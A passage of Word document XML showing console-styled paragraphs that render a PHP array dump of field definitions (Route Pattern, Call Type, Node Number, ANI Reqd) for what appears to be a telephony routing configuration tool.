            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '8081ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F723C7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44245917" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="417AB25A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 2,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B190F39" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Total max',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B69C018" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12FB3003" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="496DAE05" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FB9C1DF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="644F497F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Route_Pattern</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C383E6"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7A7E492" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0003ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF8A2F5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23907CD4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7911932D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 5,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32480E19" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Route Pattern',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1151AC87" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0554698C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1261E3AC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            0 =&gt; 'route pattern or partition-route-table',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5067FFB8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            1 =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40CA2590" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="260FD87C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48F0D859" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA8BD39" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16702D52" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Call_Type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68874EB2"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9E2ED70" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0004ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01BBB550" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19276674" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17921FF3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 4,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BE07369" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Call Type',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB85D95" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57EB002F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D72E9DB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            0 =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C826E24" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            1 =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>intl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62C85762" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            2 =&gt; 'lev0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ACD31A1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            3 =&gt; 'lev1',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF5BDF5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            4 =&gt; 'lev2',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A85635B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            5 =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pubu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A415D91" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            6 =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>unku</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18AF76C5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6C170B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33BCD2AB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DEAC382" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625B46D0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Node_Number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B88BAD"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5CD35E30" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '8fe0ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33D13852" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C6A764E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B498A58" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 3,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F4D1D1F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Node Number',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C630F37" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F4BB2FA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161E26B8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DC02B1A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70423825" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ANI_Reqd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3770CA05"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D02EEEA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'ca38ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="749483B0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="008CDA5F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A2237D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05383600" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; 'ANI </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Reqd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587C56CB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="351A9DD0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5924F5E6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            0 =&gt; 'y',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79FA6160" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">            1 =&gt; 'n',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1576A480" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03918976" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="015327DF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
